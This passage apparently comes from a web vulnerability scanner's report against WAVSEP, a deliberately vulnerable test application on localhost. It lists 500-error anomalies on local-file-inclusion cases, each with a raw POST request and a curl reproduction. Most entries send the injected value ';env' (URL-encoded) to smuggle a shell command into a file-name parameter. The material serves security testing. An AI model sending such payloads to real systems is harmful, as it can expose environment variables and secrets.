Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
